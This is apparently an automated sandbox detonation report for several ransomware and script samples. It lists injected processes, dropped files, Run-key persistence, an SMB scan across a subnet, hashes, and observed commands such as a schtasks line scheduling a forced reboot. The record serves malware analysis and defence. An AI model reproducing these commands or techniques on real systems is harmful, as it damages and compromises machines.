File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSSMS.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\SyncClear.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\DebugPing.vbs C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E4F2.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1764 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1732 wrote to memory of 2840 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 2840 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 2840 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 2840 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 1732 wrote to memory of 3036 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\E4F2.tmp
PID 1732 wrote to memory of 3036 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\E4F2.tmp
PID 1732 wrote to memory of 3036 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\E4F2.tmp
PID 1732 wrote to memory of 3036 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\E4F2.tmp
PID 2840 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2840 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2840 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2840 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35

C:\Users\Admin\AppData\Local\Temp\E4F2.tmp

"C:\Users\Admin\AppData\Local\Temp\E4F2.tmp" \\.\pipe\{05AF6699-F0DE-49E6-9A76-C4348E70F621}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:35

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/1732-0-0x0000000000140000-0x000000000019E000-memory.dmp

memory/1732-8-0x0000000000140000-0x000000000019E000-memory.dmp

memory/1732-9-0x0000000000140000-0x000000000019E000-memory.dmp

\Users\Admin\AppData\Local\Temp\E4F2.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/1732-24-0x0000000000140000-0x000000000019E000-memory.dmp

memory/1732-11-0x0000000000140000-0x000000000019E000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20241010-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\clvkjuet = "C:\\Users\\Admin\\Nbbzwmhrr\\oqjajuet.exe" C:\Windows\SysWOW64\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2268 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2872 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2872 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2872 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2872 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2872 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 3024 wrote to memory of 2880 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 3024 wrote to memory of 2880 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 3024 wrote to memory of 2880 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 3024 wrote to memory of 2880 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2880 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre
PID 2876 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre C:\Windows\SysWOW64\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre

C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre

C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre

C:\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre

C:\Windows\SysWOW64\svchost.exe

svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 nvufvwieg.com udp

Files

memory/2872-8-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2872-4-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-2-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-1-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-10-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-13-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-11-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-12-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2872-16-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3024-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/3024-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/3024-18-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

\Users\Admin\AppData\Local\Temp\nwkpmzylpl.pre

MD5 1b2d2a4b97c7c2727d571bbf9376f54f
SHA1 1fc29938ec5c209ba900247d2919069b320d33b0
SHA256 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e
SHA512 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0

memory/3024-27-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2876-45-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2120-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2120-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2120-56-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

147s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test2.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

139s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

96s

Max time network

139s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\mshta.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
